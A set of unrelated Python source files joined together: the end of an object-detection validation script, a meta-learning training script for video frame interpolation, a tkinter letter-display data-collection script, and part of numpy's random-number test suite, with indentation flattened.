opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466
LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
device=opt.device, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
LOGGER.info(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, device=opt.device, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
train_dain.py
|
import sys
import os
import time
import threading
import torch
from torch.autograd import Variable
import torch.utils.data
from lr_scheduler import *
import cv2
import numpy
from AverageMeter import *
from loss_function import *
import datasets
import balancedsampler
import networks
from my_args import args
import copy
import random
from tqdm import tqdm
import warnings
warnings.filterwarnings("ignore", category=UserWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
META_ALGORITHM = args.meta # [MAML, Reptile]
TRAIN_ITER_CUT = 1e6 if args.train_iter==-1 else args.train_iter
VAL_ITER_CUT = 1e6 if args.val_iter==-1 else args.val_iter
def crop(im, maxH=640, maxW=1280): # crop images if too big (causes out-of-memory error)
# im.size() : NCHW
H, W = im.size(2), im.size(3)
return im[:, :, :min(H, maxH), :min(W, maxW)].clone()
def train():
torch.manual_seed(args.seed)
model = networks.__dict__[args.netName](channel=args.channels,
filter_size = args.filter_size ,
timestep=args.time_step,
training=True)
original_model = networks.__dict__[args.netName](channel=args.channels,
filter_size = args.filter_size ,
timestep=args.time_step,
training=True)
if args.use_cuda:
print("Turn the model into CUDA")
model = model.cuda()
original_model = original_model.cuda()
if not args.SAVED_MODEL==None:
args.SAVED_MODEL ='./model_weights/'+ args.SAVED_MODEL + "/best" + ".pth"
print("Fine tuning on " + args.SAVED_MODEL)
if not args.use_cuda:
pretrained_dict = torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage)
# model.load_state_dict(torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage))
else:
pretrained_dict = torch.load(args.SAVED_MODEL)
# model.load_state_dict(torch.load(args.SAVED_MODEL))
#print([k for k,v in pretrained_dict.items()])
model_dict = model.state_dict()
# 1. filter out unnecessary keys
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
# 2. overwrite entries in the existing state dict
model_dict.update(pretrained_dict)
# 3. load the new state dict
model.load_state_dict(model_dict)
# For comparison in meta training
original_model.load_state_dict(model_dict)
pretrained_dict = None
if type(args.datasetName) == list:
train_sets, test_sets = [],[]
for ii, jj in zip(args.datasetName, args.datasetPath):
tr_s, te_s = datasets.__dict__[ii](jj, split = args.dataset_split,single = args.single_output, task = args.task)
train_sets.append(tr_s)
test_sets.append(te_s)
train_set = torch.utils.data.ConcatDataset(train_sets)
test_set = torch.utils.data.ConcatDataset(test_sets)
else:
train_set, test_set = datasets.__dict__[args.datasetName](args.datasetPath)
train_loader = torch.utils.data.DataLoader(
train_set, batch_size = args.batch_size,
sampler=balancedsampler.RandomBalancedSampler(train_set, int(len(train_set) / args.batch_size )),
num_workers= args.workers, pin_memory=True if args.use_cuda else False)
val_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size,
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
print('{} samples found, {} train samples and {} test samples '.format(len(test_set)+len(train_set),
len(train_set),
len(test_set)))
# if not args.lr == 0:
print("train the interpolation net")
'''optimizer = torch.optim.Adamax([
#{'params': model.initScaleNets_filter.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.initScaleNets_filter1.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.initScaleNets_filter2.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.ctxNet.parameters(), 'lr': args.ctx_lr_coe * args.lr},
#{'params': model.flownets.parameters(), 'lr': args.flow_lr_coe * args.lr},
#{'params': model.depthNet.parameters(), 'lr': args.depth_lr_coe * args.lr},
{'params': model.rectifyNet.parameters(), 'lr': args.rectify_lr}
],
#lr=args.lr, momentum=0, weight_decay=args.weight_decay)
lr=args.lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)'''
optimizer = torch.optim.Adamax(model.rectifyNet.parameters(), lr=args.outer_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
# Fix weights for early layers
for param in model.initScaleNets_filter.parameters():
param.requires_grad = False
for param in model.initScaleNets_filter1.parameters():
param.requires_grad = False
for param in model.initScaleNets_filter2.parameters():
param.requires_grad = False
for param in model.ctxNet.parameters():
param.requires_grad = False
for param in model.flownets.parameters():
param.requires_grad = False
for param in model.depthNet.parameters():
param.requires_grad = False
scheduler = ReduceLROnPlateau(optimizer, 'min',factor=args.factor, patience=args.patience,verbose=True)
print("*********Start Training********")
print("LR is: "+ str(float(optimizer.param_groups[0]['lr'])))
print("EPOCH is: "+ str(int(len(train_set) / args.batch_size )))
print("Num of EPOCH is: "+ str(args.numEpoch))
def count_network_parameters(model):
parameters = filter(lambda p: p.requires_grad, model.parameters())
N = sum([numpy.prod(p.size()) for p in parameters])
return N
print("Num. of model parameters is :" + str(count_network_parameters(model)))
if hasattr(model,'flownets'):
print("Num. of flow model parameters is :" +
str(count_network_parameters(model.flownets)))
if hasattr(model,'initScaleNets_occlusion'):
print("Num. of initScaleNets_occlusion model parameters is :" +
str(count_network_parameters(model.initScaleNets_occlusion) +
count_network_parameters(model.initScaleNets_occlusion1) +
count_network_parameters(model.initScaleNets_occlusion2)))
if hasattr(model,'initScaleNets_filter'):
print("Num. of initScaleNets_filter model parameters is :" +
str(count_network_parameters(model.initScaleNets_filter) +
count_network_parameters(model.initScaleNets_filter1) +
count_network_parameters(model.initScaleNets_filter2)))
if hasattr(model, 'ctxNet'):
print("Num. of ctxNet model parameters is :" +
str(count_network_parameters(model.ctxNet)))
if hasattr(model, 'depthNet'):
print("Num. of depthNet model parameters is :" +
str(count_network_parameters(model.depthNet)))
if hasattr(model,'rectifyNet'):
print("Num. of rectifyNet model parameters is :" +
str(count_network_parameters(model.rectifyNet)))
training_losses = AverageMeter()
#original_training_losses = AverageMeter()
batch_time = AverageMeter()
auxiliary_data = []
saved_total_loss = 10e10
saved_total_PSNR = -1
ikk = 0
for kk in optimizer.param_groups:
if kk['lr'] > 0:
ikk = kk
break
for t in range(args.numEpoch):
print("The id of this in-training network is " + str(args.uid))
print(args)
print("Learning rate for this epoch: %s" % str(round(float(ikk['lr']),7)))
#Turn into training mode
model = model.train()
#for i, (X0_half,X1_half, y_half) in enumerate(train_loader):
_t = time.time()
for i, images in enumerate(train_loader):
if i >= min(TRAIN_ITER_CUT, int(len(train_set) / args.batch_size )):
#(0 if t == 0 else EPOCH):#
break
if args.use_cuda:
images = [im.cuda() for im in images]
images = [Variable(im, requires_grad=False) for im in images]
# For VimeoTriplet
#X0, y, X1 = images[0], images[1], images[2]
# For VimeoSepTuplet
X0, y, X1 = images[2], images[3], images[4]
outerstepsize = args.outer_lr
k = args.num_inner_update # inner loop update iteration
inner_optimizer = torch.optim.Adamax(model.rectifyNet.parameters(),
lr=args.inner_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
if META_ALGORITHM == "Reptile":
# Reptile setting
weights_before = copy.deepcopy(model.state_dict())
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6], [2, 3, 4], [0, 1, 2], [4, 5, 6] ]
total_loss = 0
for ind in indices:
meta_X0, meta_y, meta_X1 = images[ind[0]].clone(), images[ind[1]].clone(), images[ind[2]].clone()
diffs, offsets, filters, occlusions = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
_total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
total_loss = total_loss + _total_loss
# total *= 2 / len(indices)
inner_optimizer.zero_grad()
total_loss.backward()
inner_optimizer.step()
# Reptile update
weights_after = model.state_dict()
model.load_state_dict({name :
weights_before[name] + (weights_after[name] - weights_before[name]) * outerstepsize
for name in weights_before})
with torch.no_grad():
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
elif META_ALGORITHM == "MAML":
#weights_before = copy.deepcopy(model.state_dict())
base_model = copy.deepcopy(model)
#fast_weights = list(filter(lambda p: p.requires_grad, model.parameters()))
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6] ]
support_loss = 0
for ind in indices:
meta_X0, meta_y, meta_X1 = images[ind[0]].clone(), images[ind[1]].clone(), images[ind[2]].clone()
diffs, offsets, filters, occlusions = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
_total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
support_loss = support_loss + _total_loss
#grad = torch.autograd.grad(loss, fast_weights)
#fast_weights = list(map(lambda p: p[1] - args.lr * p[0], zip(grad, fast_weights)))
inner_optimizer.zero_grad()
support_loss.backward() # create_graph=True
inner_optimizer.step()
# Forward on query set
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
# copy parameters to comnnect the computational graph
for param, base_param in zip(model.rectifyNet.parameters(), base_model.rectifyNet.parameters()):
param.data = base_param.data
filtered_params = filter(lambda p: p.requires_grad, model.parameters())
optimizer.zero_grad()
grads = torch.autograd.grad(total_loss, list(filtered_params)) # backward on weights_before: FO-MAML
j = 0
#print('[before update]')
#print(list(model.parameters())[45][-1])
for _i, param in enumerate(model.parameters()):
if param.requires_grad:
#param = param - outerstepsize * grads[j]
param.grad = grads[j]
j += 1
optimizer.step()
#print('[after optim.step]')
#print(list(model.parameters())[45][-1])
batch_time.update(time.time() - _t)
_t = time.time()
if i % 100 == 0: #max(1, int(int(len(train_set) / args.batch_size )/500.0)) == 0:
print("Ep[%s][%05d/%d] Time: %.2f Pix: %s TV: %s Sym: %s Total: %s Avg. Loss: %s" % (
str(t), i, int(len(train_set)) // args.batch_size,
batch_time.avg,
str([round(x.item(),5) for x in pixel_loss]),
str([round(x.item(),4) for x in offset_loss]),
str([round(x.item(), 4) for x in sym_loss]),
str([round(x.item(),5) for x in [total_loss]]),
str([round(training_losses.avg, 5)]) ))
batch_time.reset()
if t == 1:
# delete the pre validation weights for cleaner workspace
if os.path.exists(args.save_path + "/epoch" + str(0) +".pth" ):
os.remove(args.save_path + "/epoch" + str(0) +".pth")
if os.path.exists(args.save_path + "/epoch" + str(t-1) +".pth"):
os.remove(args.save_path + "/epoch" + str(t-1) +".pth")
torch.save(model.state_dict(), args.save_path + "/epoch" + str(t) +".pth")
# print("\t\t**************Start Validation*****************")
#Turn into evaluation mode
val_total_losses = AverageMeter()
val_total_pixel_loss = AverageMeter()
val_total_PSNR_loss = AverageMeter()
val_total_tv_loss = AverageMeter()
val_total_pws_loss = AverageMeter()
val_total_sym_loss = AverageMeter()
for i, (images, imgpaths) in enumerate(tqdm(val_loader)):
#if i < 50: #i < 11 or (i > 14 and i < 50):
# continue
if i >= min(VAL_ITER_CUT, int(len(test_set)/ args.batch_size)):
break
if args.use_cuda:
images = [im.cuda() for im in images]
#X0, y, X1 = images[0], images[1], images[2]
#X0, y, X1 = images[2], images[3], images[4]
# define optimizer to update the inner loop
inner_optimizer = torch.optim.Adamax(model.rectifyNet.parameters(),
lr=args.inner_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
# Reptile testing - save base model weights
weights_base = copy.deepcopy(model.state_dict())
k = args.num_inner_update # 2
model.train()
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6] ]
ind = indices[_k % 2]
meta_X0, meta_y, meta_X1 = crop(images[ind[0]]), crop(images[ind[1]]), crop(images[ind[2]])
diffs, offsets, filters, occlusions, _ = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
inner_optimizer.zero_grad()
total_loss.backward()
inner_optimizer.step()
# Actual target validation performance
with torch.no_grad():
if args.datasetName == 'Vimeo_90K_sep':
X0, y, X1 = images[2], images[3], images[4]
#diffs, offsets,filters,occlusions = model(torch.stack((X0,y,X1),dim = 0))
diffs, offsets,filters,occlusions, output = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2, dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
else: # HD_dataset testing
for j in range(len(images) // 2):
mH, mW = 720, 1280
X0, y, X1 = crop(images[2*j], maxH=mH, maxW=mW), crop(images[2*j+1], maxH=mH, maxW=mW), crop(images[2*j+2], maxH=mH, maxW=mW)
diffs, offsets,filters,occlusions , output = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2, dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
# Reset model to its base weights
model.load_state_dict(weights_base)
#del weights_base, inner_optimizer, meta_X0, meta_y, meta_X1, X0, y, X1, pixel_loss, offset_loss, sym_loss, total_loss, val_total_loss, diffs, offsets, filters, occlusions
VIZ = False
exp_name = 'meta_test'
if VIZ:
for b in range(images[0].size(0)):
imgpath = imgpaths[0][b]
savepath = os.path.join('checkpoint', exp_name, 'vimeoSeptuplet', imgpath.split('/')[-3], imgpath.split('/')[-2])
if not os.path.exists(savepath):
os.makedirs(savepath)
img_pred = (output[b].data.permute(1, 2, 0).clamp_(0, 1).cpu().numpy()[..., ::-1] * 255).astype(numpy.uint8)
cv2.imwrite(os.path.join(savepath, 'im2_pred.png'), img_pred)
''' # Original validation (not meta)
with torch.no_grad():
if args.use_cuda:
images = [im.cuda() for im in images]
#X0, y, X1 = images[0], images[1], images[2]
X0, y, X1 = images[2], images[3], images[4]
#diffs, offsets,filters,occlusions = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2,
dim=1),dim=1),dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
#
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
print(".",end='',flush=True)
'''
print("\nEpoch " + str(int(t)) +
"\tlearning rate: " + str(float(ikk['lr'])) +
"\tAvg Training Loss: " + str(round(training_losses.avg,5)) +
"\tValidate Loss: " + str([round(float(val_total_losses.avg), 5)]) +
"\tValidate PSNR: " + str([round(float(val_total_PSNR_loss.avg), 5)]) +
"\tPixel Loss: " + str([round(float(val_total_pixel_loss.avg), 5)]) +
"\tTV Loss: " + str([round(float(val_total_tv_loss.avg), 4)]) +
"\tPWS Loss: " + str([round(float(val_total_pws_loss.avg), 4)]) +
"\tSym Loss: " + str([round(float(val_total_sym_loss.avg), 4)])
)
auxiliary_data.append([t, float(ikk['lr']),
training_losses.avg, val_total_losses.avg, val_total_pixel_loss.avg,
val_total_tv_loss.avg,val_total_pws_loss.avg,val_total_sym_loss.avg])
numpy.savetxt(args.log, numpy.array(auxiliary_data), fmt='%.8f', delimiter=',')
training_losses.reset()
#original_training_losses.reset()
print("\t\tFinished an epoch, Check and Save the model weights")
# we check the validation loss instead of training loss. OK~
if saved_total_loss >= val_total_losses.avg:
saved_total_loss = val_total_losses.avg
torch.save(model.state_dict(), args.save_path + "/best"+".pth")
print("\t\tBest Weights updated for decreased validation loss\n")
else:
print("\t\tWeights Not updated for undecreased validation loss\n")
#schdule the learning rate
scheduler.step(val_total_losses.avg)
print("*********Finish Training********")
if __name__ == '__main__':
sys.setrecursionlimit(100000)# 0xC00000FD exception for the recursive detach of gradients.
threading.stack_size(200000000)# 0xC00000FD exception for the recursive detach of gradients.
thread = threading.Thread(target=train)
thread.start()
thread.join()
exit(0)
|
short_letter_data.py
|
# Run file to collect data when exposed to random letter
from data import *
from tkinter import *
import os
import random as r
import threading
import numpy as np
# Set values for data
wait_time = 1000 # How long to wait in between exposures
expose_time = 1000 # How long letter should be exposed
# Letters to be sampled
# samples = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
# 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
samples = ['A', 'B']
# Set dimensions
w = 900
h = 556
root = Tk()
root.geometry(str(w)+'x'+str(h))
root.title('Letter Viewer')
graphing_area = Canvas(root, width=w, height=h)
graphing_area.pack()
# Function to display letter to be thought of, will set saving variable
def display_letter(canvas, frame, wait):
canvas.delete('all')
if wait:
file_list = []
for name in os.listdir(path[:-1]):
if name[0] == save_info[1]:
file_list.append(int(name[1:-4]))
if len(file_list) < 1:
code = 0
else:
code = max(file_list) + 1
if len(save_info[2]) >= 500:
np.savetxt(path+save_info[1]+str(code)+'.csv', np.array(save_info[2][:500]), delimiter=',')
else:
pass
letter = samples[r.randint(0, len(samples) - 1)]
canvas.create_text(w/2, h/2, font="Arial "+str(int(round(h/3, 0))), text=letter, anchor='center')
# For the next 5 sec collect data
save_info[0] = False
save_info[1] = letter.lower()
save_info[2] = []
frame.after(wait_time, display_letter, canvas, frame, False)
else:
save_info[0] = True
frame.after(expose_time, display_letter, canvas, frame, True)
thread = threading.Thread(target=data_loop, args=[False, False, False, 1, True])
thread.start()
graphing_area.create_text(w/2, h/2, font="Arial "+str(int(round(h/3, 0))), text='Loading...', anchor='center')
root.after(10000, display_letter, graphing_area, root, True)
root.mainloop()
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns)
from numpy import random
from numpy.compat import asbytes
import sys
import warnings
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
np.testing.assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
actual = np.random.random_integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
